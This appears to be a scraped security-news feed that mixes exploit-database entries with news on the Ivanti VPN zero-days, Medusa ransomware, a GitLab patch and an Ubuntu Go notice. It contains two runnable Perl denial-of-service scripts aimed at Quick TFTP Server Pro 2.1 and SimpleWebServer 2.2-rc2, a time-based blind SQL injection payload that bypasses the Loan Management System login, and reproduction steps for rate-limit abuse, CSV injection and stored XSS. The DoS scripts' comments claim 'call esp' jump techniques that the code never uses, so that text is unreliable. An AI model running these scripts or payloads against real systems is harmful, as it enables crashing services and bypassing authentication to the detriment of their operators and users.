Quick TFTP Server Pro version 2.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Quick TFTP Server Pro 2.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 12 january 2024  
# Vendor Homepage: https://www.tallsoft.com/  
# Download to demo: https://drive.google.com/file/d/1Q4tIYjtv9Aqe5VE1fwnT18d3Cc-xkYEX/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Quick TFTP Server Pro 2.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=yz7_ImFYueA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to TFTP.  
#The following request sends a large amount of data to the TFTP to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $filename = "exploit";

$shell = "A"x317;

my $mode = "A" x 1360;

my $muha = "\x00\x02" .$filename . "\x00" .$mode;

socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or die "socket() failed: $!";  
send(SOCKET, $muha, 0, sockaddr_in($port, inet_aton($ip))) or die "send() failed: $!";  

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Quick TFTP Server Pro 2.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Quick TFTP Server Pro 2.1 Denial Of Service

Copyright Loan Management System 2024 version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: Copyright © Loan Management System 2024-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 01/12/2024## Vendor: https://twitter.com/razormist## Software: https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter is vulnerable to SQL injection attacks. Thepayload ' was submitted in the password parameter, and a databaseerror message was returned. Also, the attacker can bypass the loginform and log in to the system as an administrator using thisvulnerability SQLi bypass authentication.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=aeoZNyVE&password=r8D!y8e!I8' AND (SELECT 8282FROM (SELECT(SLEEP(7)))jrPA)# PgMx&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/razormist/2024/Loan-Management-System-2024-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/copyright-loan-management-system-2024.html)## Time spend:00:35:00

Copyright Loan Management System 2024 1.0 SQL Injection

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.
"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an

Vulnerability / Threat Intelligence

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023.

"These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker **UNC5221**.

The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances.

Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment.

According to Ivanti, the intrusions impacted less than 10 customers, indicating that this could be a highly-targeted campaign. Patches for the two vulnerabilities (informally called ConnectAround) are expected to become available in the week of January 22.

Mandiant's analysis of the attacks has revealed the presence of five different custom malware families, besides injecting malicious code into legitimate files within ICS and using other legitimate tools like BusyBox and PySoxy to facilitate subsequent activity.

"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said.

LIGHTWIRE is one of the two web shells, the other being WIREFIRE, which are "lightweight footholds" designed to ensure persistent remote access to compromised devices. While LIGHTWIRE is written in Perl CGI, WIREFIRE is implemented in Python.

Also used in the attacks are a JavaScript-based credential stealer dubbed WARPWIRE and a passive backdoor named ZIPLINE that's capable of downloading/uploading files, establishing a reverse shell, creating a proxy server, and setting up a tunneling server to dispatch traffic between multiple endpoints.

"This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released," Mandiant further added.

UNC5221 has not been linked to any previously known group or a particular country, although the targeting of edge infrastructure by weaponizing zero-day flaws and the use of compromise command-and-control (C2) infrastructure to bypass detection bears all the hallmarks of an advanced persistent threat (APT).

"UNC5221's activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors," Mandiant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands.
“As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their

The threat actors associated with the **Medusa ransomware** have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands.

"As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion or download of all the data," Palo Alto Networks Unit 42 researchers Anthony Galiette and Doel Santos said in a report shared with The Hacker News.

"All of these options have a price tag depending on the organization impacted by this group."

Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting a wide range of industries such as high technology, education, manufacturing, healthcare, and retail.

As many as 74 organizations, mostly in the U.S., the U.K., France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023.

Ransomware attacks orchestrated by the group commence with the exploitation of internet-facing assets or applications with known unpatched vulnerabilities and hijacking of legitimate accounts, often employing initial access brokers to obtain a foothold to target networks.

In one instance observed by the cybersecurity firm, a Microsoft Exchange Server was exploited to upload a web shell, which was then used as a conduit to install and execute the ConnectWise remote monitoring and management (RMM) software.

A notable aspect of the infections is the reliance on living-off-the-land (LotL) techniques to blend in with legitimate activity and sidestep detection. Also observed is the use of a pair of kernel drivers to terminate a hard-coded list of security products.

The initial access phase is followed by discovery and reconnaissance of the compromised network, with the actors ultimately launching the ransomware to enumerate and encrypt all files save for those with the extensions .dll, .exe, .lnk, and .medusa (the extension given to the encrypted files).

For each compromised victim, Medusa's leak site displays information about the organizations, ransom demanded, the amount of time left before the stolen data is released publicly, and the number of views in a bid to exert pressure on the company.

The actors also offer different choices to the victim, all of which involve some form of extortion to delete or download the pilfered data and seek a time extension to prevent the data from being released.

As ransomware continues to be a rampant threat, targeting tech companies, healthcare, critical infrastructure, and everything in between, the threat actors behind it are getting more brazen with their tactics, going beyond publicly naming and shaming organizations by resorting to threats of physical violence and even dedicated public relations channels.

"Ransomware has changed many facets of the threat landscape, but a key recent development is its increasing commoditization and professionalization," Sophos researchers said last month, calling ransomware gangs "increasingly media-savvy."

Medusa, per Unit 42, not only has a media team to likely handle their branding efforts, but also leverages a public Telegram channel named "information support," where files of compromised organizations are shared and can be accessed over the clearnet. The channel was set up in July 2021.

"The emergence of the Medusa ransomware in late 2022 and its notoriety in 2023 marks a significant development in the ransomware landscape," the researchers said. "This operation showcases complex propagation methods, leveraging both system vulnerabilities and initial access brokers, while adeptly avoiding detection through living-off-the-land techniques."

The development comes as Arctic Wolf Labs publicized two cases in which victims of Akira and Royal ransomware gangs were targeted by malicious third-parties posing as security researchers for secondary extortion attempts.

"Threat actors spun a narrative of trying to help victim organizations, offering to hack into the server infrastructure of the original ransomware groups involved to delete exfiltrated data," security researchers Stefan Hostetler and Steven Campbell said, noting the threat actor sought about 5 bitcoin in exchange for the service.

It also follows a new advisory from the Finnish National Cyber Security Centre (NCSC-FI) about a spike in Akira ransomware incidents in the country towards the end of 2023 by exploiting a security flaw in Cisco VPN appliances (CVE-2023-20269, CVSS score: 5.0) to breach domestic entities.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion

GitLab has released security updates to address two critical vulnerabilities, including one that could be exploited to take over accounts without requiring any user interaction.
Tracked as CVE-2023-7028, the flaw has been awarded the maximum severity of 10.0 on the CVSS scoring system and could facilitate account takeover by sending password reset emails to an unverified email address.
The

DevSecOps / Software security

GitLab has released security updates to address two critical vulnerabilities, including one that could be exploited to take over accounts without requiring any user interaction.

Tracked as **CVE-2023-7028**, the flaw has been awarded the maximum severity of 10.0 on the CVSS scoring system and could facilitate account takeover by sending password reset emails to an unverified email address.

The DevSecOps platform said the vulnerability is the result of a bug in the email verification process, which allowed users to reset their password through a secondary email address.

It affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE) using the below versions -

*   16.1 prior to 16.1.6
*   16.2 prior to 16.2.9
*   16.3 prior to 16.3.7
*   16.4 prior to 16.4.5
*   16.5 prior to 16.5.6
*   16.6 prior to 16.6.4
*   16.7 prior to 16.7.2

GitLab said it addressed the issue in GitLab versions 16.5.6, 16.6.4, and 16.7.2, in addition to backporting the fix to versions 16.1.6, 16.2.9, 16.3.7, and 16.4.5. The company further noted the bug was introduced in 16.1.0 on May 1, 2023.

"Within these versions, all authentication mechanisms are impacted," GitLab said. "Additionally, users who have two-factor authentication enabled are vulnerable to password reset but not account takeover as their second authentication factor is required to login."

Also patched by GitLab as part of the latest update is another critical flaw (CVE-2023-5356, CVSS score: 9.6), which permits a user to abuse Slack/Mattermost integrations to execute slash commands as another user.

To mitigate any potential threats, it's advised to upgrade the instances to a patched version as soon as possible and enable 2FA, if not already, particularly for users with elevated privileges.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Urgent: GitLab Releases Patch for Critical Vulnerabilities - Update ASAP

Ubuntu Security Notice 6574-1 - Takeshi Kaneko discovered that Go did not properly handle comments and special tags in the script context of html/template module. An attacker could possibly use this issue to inject Javascript code and perform a cross site scripting attack. This issue only affected Go 1.20 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.04. It was discovered that Go did not properly validate the "//go:cgo_" directives during compilation. An attacker could possibly use this issue to inject arbitrary code during compile time.

==========================================================================  
Ubuntu Security Notice USN-6574-1  
January 11, 2024

Go vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Go.

Software Description:  
- golang-1.20: Go programming language compiler  
- golang-1.21: Go programming language compiler

Details:

Takeshi Kaneko discovered that Go did not properly handle comments and  
special tags in the script context of html/template module. An attacker  
could possibly use this issue to inject Javascript code and perform a cross  
site scripting attack. This issue only affected Go 1.20 in Ubuntu 20.04 LTS,  
Ubuntu 22.04 LTS and Ubuntu 23.04. (CVE-2023-39318, CVE-2023-39319)

It was discovered that Go did not properly validate the "//go:cgo_"  
directives during compilation. An attacker could possibly use this issue to  
inject arbitrary code during compile time. (CVE-2023-39323)

It was discovered that Go did not limit the number of simultaneously  
executing handler goroutines in the net/http module. An attacker could  
possibly use this issue to cause a panic resulting into a denial of service.  
(CVE-2023-39325, CVE-2023-44487)

It was discovered that the Go net/http module did not properly validate the  
chunk extensions reading from a request or response body. An attacker could  
possibly use this issue to read sensitive information. (CVE-2023-39326)

It was discovered that Go did not properly validate the insecure "git://"  
protocol when using go get to fetch a module with the ".git" suffix. An  
attacker could possibly use this issue to bypass secure protocol checks.  
(CVE-2023-45285)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  golang-1.20                     1.20.8-1ubuntu0.23.10.1  
  golang-1.20-go                  1.20.8-1ubuntu0.23.10.1  
  golang-1.20-src                 1.20.8-1ubuntu0.23.10.1  
  golang-1.21                     1.21.1-1ubuntu0.23.10.1  
  golang-1.21-go                  1.21.1-1ubuntu0.23.10.1  
  golang-1.21-src                 1.21.1-1ubuntu0.23.10.1

Ubuntu 23.04:  
  golang-1.20                     1.20.3-1ubuntu0.2  
  golang-1.20-go                  1.20.3-1ubuntu0.2  
  golang-1.20-src                 1.20.3-1ubuntu0.2  
  golang-1.21                     1.21.1-1~ubuntu23.04.2  
  golang-1.21-go                  1.21.1-1~ubuntu23.04.2  
  golang-1.21-src                 1.21.1-1~ubuntu23.04.2

Ubuntu 22.04 LTS:  
  golang-1.20                     1.20.3-1ubuntu0.1~22.04.1  
  golang-1.20-go                  1.20.3-1ubuntu0.1~22.04.1  
  golang-1.20-src                 1.20.3-1ubuntu0.1~22.04.1  
  golang-1.21                     1.21.1-1~ubuntu22.04.2  
  golang-1.21-go                  1.21.1-1~ubuntu22.04.2  
  golang-1.21-src                 1.21.1-1~ubuntu22.04.2

Ubuntu 20.04 LTS:  
  golang-1.20                     1.20.3-1ubuntu0.1~20.04.1  
  golang-1.20-go                  1.20.3-1ubuntu0.1~20.04.1  
  golang-1.20-src                 1.20.3-1ubuntu0.1~20.04.1  
  golang-1.21                     1.21.1-1~ubuntu20.04.2  
  golang-1.21-go                  1.21.1-1~ubuntu20.04.2  
  golang-1.21-src                 1.21.1-1~ubuntu20.04.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6574-1  
  CVE-2023-39318, CVE-2023-39319, CVE-2023-39323, CVE-2023-39325,  
  CVE-2023-39326, CVE-2023-44487, CVE-2023-45285

Package Information:  
  https://launchpad.net/ubuntu/+source/golang-1.20/1.20.8-1ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/golang-1.21/1.21.1-1ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/golang-1.20/1.20.3-1ubuntu0.2  
  https://launchpad.net/ubuntu/+source/golang-1.21/1.21.1-1~ubuntu23.04.2  
  https://launchpad.net/ubuntu/+source/golang-1.20/1.20.3-1ubuntu0.1~22.04.1  
  https://launchpad.net/ubuntu/+source/golang-1.21/1.21.1-1~ubuntu22.04.2  
  https://launchpad.net/ubuntu/+source/golang-1.20/1.20.3-1ubuntu0.1~20.04.1  
  https://launchpad.net/ubuntu/+source/golang-1.21/1.21.1-1~ubuntu20.04.2

Ubuntu Security Notice USN-6574-1

SimpleWebServer version 2.2-rc2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 11 january 2024  
# Vendor Homepage:  http://www.pmx.it/  
# Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSimpleWebServer 2.2-rc2   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

our $exploit = "\x41"x2014;

$exploit     = "x\41"x2104;

if ($socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "TCP"))  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";  
        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $ip failed!\n";  
    exit;  
}

              print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                        ,,__  
              ..  ..   / o._)           
             /--'/--\  \-'||    
            /        \_/ / |    
          .'\  \__\  __.'.'     
            )\ |  )\ |        
           // \\ // \\  
          ||_  \\|_  \\_  
          '--' '--'' '--'  

                [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

SimpleWebServer 2.2-rc2 Denial Of Service

PHPJabbers Event Ticketing System version 1.0 suffers from a missing rate limiting vulnerability.

    # Exploit Title: PHPJabbers Event Ticketing System v1.0 - No Rate Limit# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51339Descriptions:A lack of rate limiting in the "Forgot Email" feature of PHPJabbersEvent Ticketing System v1.0 allows attackers to send an excessiveamount of reset requests for a legitimate user, leading to a possibleDenial of Service (DoS) via a large amount of generated e-mailmessages.Steps to Reproduce:1. Visit this URLhttps://demo.phpjabbers.com/1704798072_893/index.php?controller=pjAdmin&action=pjActionIndex2. Now use the account mail that is already registered on this website.3. Capture request data using burp suite and send it to Intruder Tab4. Configure Intruder and Start Attack5. Check your email.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51339)

PHPJabbers Event Ticketing System 1.0 Missing Rate Limiting

PHPJabbers Meeting Room Booking System version 1.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - CSV Injection# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11# CVE-2023-51336Descriptions:PHPJabbers Meeting Room Booking System v1.0 is vulnerable to CSVinjection vulnerability which allows an attacker to execute remotecode. The vulnerability exists due to insufficient input validation onthe Unique ID field in the Reservations list that is used to constructa CSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51336)

PHPJabbers Meeting Room Booking System 1.0 CSV Injection

PHPJabbers Meeting Room Booking System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Meeting Room Booking System v1.0 -Multiple Stored XSS# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51338Descriptions:PHPJabbers Meeting Room Booking System v1.0 is vulnerable to MultipleStored Cross-Site Scripting. Multiple Stored XSS is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "title, name".3. Go to System Users Menu then click add user.4. Then use any XSS Payload in "Name" input field and Save.5. You will see xss popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51338)

Tag

#git